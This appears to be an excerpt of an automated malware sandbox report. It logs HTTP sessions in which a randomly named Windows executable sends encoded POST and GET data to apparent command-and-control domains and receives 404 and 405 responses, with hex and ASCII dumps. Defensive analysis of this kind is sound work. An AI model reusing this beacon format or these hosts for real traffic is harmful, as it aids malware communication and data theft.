                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                    Jul 3, 2024 17:53:44.098366022 CEST537INData Raw: 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d
                                                    Data Ascii: oglelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 1


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    42192.168.2.649773172.217.18.19805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:53:46.005815029 CEST649OUTPOST /s0j2/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 236
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.artvectorcraft.store
                                                    Origin: http://www.artvectorcraft.store
                                                    Referer: http://www.artvectorcraft.store/s0j2/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Raw: 37 44 69 68 73 38 70 3d 4d 65 70 64 30 6b 6e 46 5a 42 43 4d 71 79 4f 53 34 6e 4d 32 4e 34 73 68 6e 54 33 32 6b 6c 7a 4b 72 66 6d 69 71 58 55 4a 56 46 4e 57 75 4d 55 75 4b 69 4d 32 36 4d 48 4a 69 35 44 46 53 37 7a 72 36 54 78 54 73 6e 75 67 6e 61 2b 33 76 7a 39 41 30 69 65 38 6d 67 33 4c 35 74 56 6b 2f 49 38 41 2f 63 6c 35 55 55 35 34 61 79 31 6d 6f 33 65 74 70 31 6a 54 67 52 31 2f 42 6e 39 63 68 66 4e 57 69 59 37 35 72 52 73 43 30 56 76 56 78 4e 65 4b 31 6e 30 58 41 71 45 2f 48 79 46 68 72 62 44 53 59 64 77 63 47 76 78 4b 39 41 6c 30 52 32 6f 58 48 76 54 6b 46 75 4c 71 73 57 67 48 46 38 66 4f 67 6e 6c 67 62 6e 55 75 65 39 51 31 69 37 4f 59 35 77 4b 41 5a 51 78 6f 4a 4c 74 74 32 75 45 71 38 41 3d 3d
                                                    Data Ascii: 7Dihs8p=Mepd0knFZBCMqyOS4nM2N4shnT32klzKrfmiqXUJVFNWuMUuKiM26MHJi5DFS7zr6TxTsnugna+3vz9A0ie8mg3L5tVk/I8A/cl5UU54ay1mo3etp1jTgR1/Bn9chfNWiY75rRsC0VvVxNeK1n0XAqE/HyFhrbDSYdwcGvxK9Al0R2oXHvTkFuLqsWgHF8fOgnlgbnUue9Q1i7OY5wKAZQxoJLtt2uEq8A==
                                                    Jul 3, 2024 17:53:46.653047085 CEST1236INHTTP/1.1 404 Not Found
                                                    Date: Wed, 03 Jul 2024 15:53:46 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Server: ghs
                                                    Content-Length: 1566
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                    Jul 3, 2024 17:53:46.653089046 CEST537INData Raw: 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d
                                                    Data Ascii: oglelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 1


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    43192.168.2.649774172.217.18.19805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:53:48.538191080 CEST1662OUTPOST /s0j2/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1248
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.artvectorcraft.store
                                                    Origin: http://www.artvectorcraft.store
                                                    Referer: http://www.artvectorcraft.store/s0j2/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Raw: 37 44 69 68 73 38 70 3d 4d 65 70 64 30 6b 6e 46 5a 42 43 4d 71 79 4f 53 34 6e 4d 32 4e 34 73 68 6e 54 33 32 6b 6c 7a 4b 72 66 6d 69 71 58 55 4a 56 46 31 57 75 2f 63 75 49 46 59 32 35 4d 48 4a 2b 70 44 45 53 37 7a 79 36 54 70 66 73 6e 6a 56 6e 66 69 33 75 51 31 41 78 51 32 38 7a 51 33 4c 6b 39 56 35 77 6f 38 56 2f 59 35 31 55 51 56 34 61 79 31 6d 6f 78 61 74 2b 77 66 54 69 52 31 38 43 6e 38 54 71 2f 4e 71 69 5a 65 47 72 52 67 4e 31 6c 50 56 79 74 4f 4b 34 78 6f 58 50 71 45 39 4b 53 45 6e 72 62 2f 33 59 64 74 6c 47 73 74 67 39 41 52 30 42 6e 4e 56 43 50 50 37 62 6f 58 74 2f 45 51 39 4f 49 75 35 6f 78 74 48 58 30 67 6f 52 66 63 4c 76 65 4b 46 34 44 37 6e 4d 43 68 55 4c 74 41 4d 6a 4b 4a 6d 68 78 68 6f 38 31 6a 62 50 32 70 72 4a 70 46 4c 62 78 4c 4e 69 67 66 4c 67 49 4b 42 35 51 38 63 66 73 47 5a 61 30 32 65 73 46 59 56 4d 46 57 35 79 53 51 30 35 38 53 47 71 4b 2f 68 69 50 77 58 61 55 67 6e 33 6f 56 75 59 74 71 38 4c 73 62 36 31 48 55 41 4f 50 68 37 65 56 49 44 64 70 4d 6f 55 58 43 2f 69 78 45 36 72 62 [TRUNCATED]
                                                    Data Ascii: 7Dihs8p=Mepd0knFZBCMqyOS4nM2N4shnT32klzKrfmiqXUJVF1Wu/cuIFY25MHJ+pDES7zy6TpfsnjVnfi3uQ1AxQ28zQ3Lk9V5wo8V/Y51UQV4ay1moxat+wfTiR18Cn8Tq/NqiZeGrRgN1lPVytOK4xoXPqE9KSEnrb/3YdtlGstg9AR0BnNVCPP7boXt/EQ9OIu5oxtHX0goRfcLveKF4D7nMChULtAMjKJmhxho81jbP2prJpFLbxLNigfLgIKB5Q8cfsGZa02esFYVMFW5ySQ058SGqK/hiPwXaUgn3oVuYtq8Lsb61HUAOPh7eVIDdpMoUXC/ixE6rbs8DC+Wf10Ho9YlOxlVBUpD2/G88bqhuN5xqG1WeRP8R0oXZII+eMtGPoWOwZaTWTDsYXFsqchWd+uBa2rcEtTlK+PTJetVG2Mkolj0cjjkSi4Kwv9eB6fONmznvLhHgOFz1ouycajXQ+OAKt16yrDqEMnC2D3ZPEDAPRPO+PbglzswYOM1lQNhqnDrt6WlomESUVO5stRxvrMmceXRrVmAjiyfK/x1P88b7kA4IXl+p4IGKcdOh3rOF+Xx9BHYHzpKZ/iJNxb8673CIuaIA1LgcLnDESQL+sSkQzBHqvVzDWIwTxYrXA3T/f/nfWX/4MJGiapTj+deMH/xkBbAXp0yXppeZJKD5k0Oy9YeqrO9ZH1BfEykuLT+oLNmXUCBm7lZXrytjIFKWDrv4oO32LavnV1+T4V3gW3CM3HlC5BVmG8xy/xk5ckVm2WwMqXfizess7ID1T3rSrsLAnw1ILu/qKZXLJPiDr905kqhLgWz4nitLSuaAwa07gR4uaV3Po7ptGo+3dWG7MIsGbEat6epZxUWOBRom8Chw20+XHae99HUSDUMhts3YOnLY9xcPi00+r6Vl1wN39f3krvk9AeHX/S2BsIA6XbFYh6BHAWwM3bTeiczNnu+oqztSYdGgJlUSGx84BPcEcSj3p9kxOqqI8o8XXJEC8Jq [TRUNCATED]
                                                    Jul 3, 2024 17:53:49.176048994 CEST1236INHTTP/1.1 404 Not Found
                                                    Date: Wed, 03 Jul 2024 15:53:49 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Server: ghs
                                                    Content-Length: 1566
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                    Jul 3, 2024 17:53:49.176536083 CEST537INData Raw: 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d
                                                    Data Ascii: oglelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 1


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    44192.168.2.649775172.217.18.19805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:53:51.072808027 CEST352OUTGET /s0j2/?7Dihs8p=BcB93STIeRzesDqYzmgjF/8Aqg2qoGbugvfC7gVQd0Epq+RTfyEF6eLz+ZShIqPWgjFYuR+pkePM3whd8giEyH2988JCuLY+vIFLWxAqbBoWpgzIu1DPnhlaAUBnkOtEvd711RA=&Bp=2LpD8tLh HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    Host: www.artvectorcraft.store
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Jul 3, 2024 17:53:51.731034040 CEST1236INHTTP/1.1 404 Not Found
                                                    Date: Wed, 03 Jul 2024 15:53:51 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Server: ghs
                                                    Content-Length: 1727
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                    Jul 3, 2024 17:53:51.731097937 CEST698INData Raw: 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d
                                                    Data Ascii: oglelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 1


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    45192.168.2.64977664.190.62.22805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:54:05.594270945 CEST622OUTPOST /pv57/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 212
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.hondamechanic.today
                                                    Origin: http://www.hondamechanic.today
                                                    Referer: http://www.hondamechanic.today/pv57/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Raw: 37 44 69 68 73 38 70 3d 33 57 30 70 4e 37 57 4e 79 2b 55 52 6c 61 52 62 58 63 58 39 61 47 55 39 6f 55 65 2b 4c 61 4b 43 2f 2f 4c 4a 33 5a 69 41 55 2f 48 55 50 4e 6b 58 45 61 36 63 68 36 6d 78 65 62 68 4c 63 69 31 75 4b 57 49 57 76 73 46 75 6c 50 52 63 45 35 70 45 44 42 65 47 35 68 4a 48 33 62 48 56 72 69 6b 65 70 78 72 4b 77 54 50 74 51 54 53 5a 44 68 6a 4d 76 70 70 4e 6c 77 67 53 65 38 47 69 37 62 77 64 71 2f 51 49 42 50 6a 36 34 47 74 72 74 54 49 50 39 76 34 6e 78 61 65 72 30 6d 73 35 5a 39 33 32 6f 6f 42 43 30 5a 2f 6b 43 77 4f 6f 42 69 46 39 74 4f 50 55 61 35 77 47 6f 6c 50 48 39 58 49 6d 64 76 32 34 4e 71 46 6e 4e 48 50 79
                                                    Data Ascii: 7Dihs8p=3W0pN7WNy+URlaRbXcX9aGU9oUe+LaKC//LJ3ZiAU/HUPNkXEa6ch6mxebhLci1uKWIWvsFulPRcE5pEDBeG5hJH3bHVrikepxrKwTPtQTSZDhjMvppNlwgSe8Gi7bwdq/QIBPj64GtrtTIP9v4nxaer0ms5Z932ooBC0Z/kCwOoBiF9tOPUa5wGolPH9XImdv24NqFnNHPy
                                                    Jul 3, 2024 17:54:06.244419098 CEST305INHTTP/1.1 405 Not Allowed
                                                    date: Wed, 03 Jul 2024 15:54:06 GMT
                                                    content-type: text/html
                                                    content-length: 154
                                                    server: Parking/1.0
                                                    connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    46192.168.2.64977764.190.62.22805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:54:08.153166056 CEST646OUTPOST /pv57/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 236
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.hondamechanic.today
                                                    Origin: http://www.hondamechanic.today
                                                    Referer: http://www.hondamechanic.today/pv57/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Raw: 37 44 69 68 73 38 70 3d 33 57 30 70 4e 37 57 4e 79 2b 55 52 6a 36 42 62 56 37 37 39 4f 57 55 69 72 55 65 2b 43 36 4b 4f 2f 2f 50 4a 33 64 36 51 56 4c 72 55 50 74 55 58 57 4f 57 63 74 61 6d 78 57 37 68 30 57 43 31 31 4b 57 4e 70 76 74 70 75 6c 50 46 63 45 38 4e 45 43 32 71 4a 32 52 4a 46 38 37 48 58 6c 43 6b 65 70 78 72 4b 77 58 76 58 51 54 36 5a 44 52 54 4d 76 49 70 4d 73 51 67 64 66 38 47 69 78 4c 78 55 71 2f 51 71 42 4c 69 66 34 45 46 72 74 53 55 50 39 36 4d 6b 6f 4b 66 67 77 6d 74 79 4b 73 53 63 69 49 63 39 39 59 37 6f 58 79 65 4a 4e 30 45 6e 78 39 50 33 49 70 51 45 6f 6e 58 31 39 33 49 4d 66 76 4f 34 66 39 4a 41 43 7a 71 52 62 72 2b 38 52 73 65 32 6d 62 44 34 4b 79 6f 74 78 6a 34 38 63 51 3d 3d
                                                    Data Ascii: 7Dihs8p=3W0pN7WNy+URj6BbV779OWUirUe+C6KO//PJ3d6QVLrUPtUXWOWctamxW7h0WC11KWNpvtpulPFcE8NEC2qJ2RJF87HXlCkepxrKwXvXQT6ZDRTMvIpMsQgdf8GixLxUq/QqBLif4EFrtSUP96MkoKfgwmtyKsSciIc99Y7oXyeJN0Enx9P3IpQEonX193IMfvO4f9JACzqRbr+8Rse2mbD4Kyotxj48cQ==
                                                    Jul 3, 2024 17:54:08.772382975 CEST305INHTTP/1.1 405 Not Allowed
                                                    date: Wed, 03 Jul 2024 15:54:08 GMT
                                                    content-type: text/html
                                                    content-length: 154
                                                    server: Parking/1.0
                                                    connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    47192.168.2.64977864.190.62.22805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:54:10.698177099 CEST1659OUTPOST /pv57/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1248
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.hondamechanic.today
                                                    Origin: http://www.hondamechanic.today
                                                    Referer: http://www.hondamechanic.today/pv57/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Raw: 37 44 69 68 73 38 70 3d 33 57 30 70 4e 37 57 4e 79 2b 55 52 6a 36 42 62 56 37 37 39 4f 57 55 69 72 55 65 2b 43 36 4b 4f 2f 2f 50 4a 33 64 36 51 56 4b 2f 55 50 38 30 58 45 35 43 63 75 61 6d 78 63 62 68 78 57 43 31 30 4b 57 31 74 76 74 30 5a 6c 4e 39 63 45 61 42 45 46 44 47 4a 68 68 4a 46 7a 62 48 57 72 69 6b 4c 70 77 62 4f 77 54 4c 58 51 54 36 5a 44 54 62 4d 6f 5a 70 4d 71 51 67 53 65 38 47 6d 37 62 78 38 71 2f 49 51 42 4c 6e 71 34 31 6c 72 73 32 30 50 77 6f 55 6b 67 4b 66 69 33 6d 74 68 4b 73 75 48 69 49 42 47 39 59 4f 46 58 79 36 4a 4a 43 46 38 31 35 4f 73 4c 70 49 33 70 55 76 57 34 58 39 34 47 50 4b 64 65 4f 78 32 64 33 62 79 53 75 2b 7a 51 4d 48 43 68 36 2f 50 46 46 74 31 77 42 6b 30 4a 64 4c 31 49 48 76 68 56 70 4b 34 4b 42 6d 31 43 65 4a 72 77 62 54 34 75 57 4e 62 6d 47 4b 42 59 35 6b 59 47 6d 72 56 37 33 70 4b 5a 6a 36 49 44 75 73 33 55 76 58 39 38 4d 46 45 51 47 41 4e 6d 65 77 79 68 39 48 70 2f 44 46 4f 45 58 2f 4a 61 54 61 2b 44 33 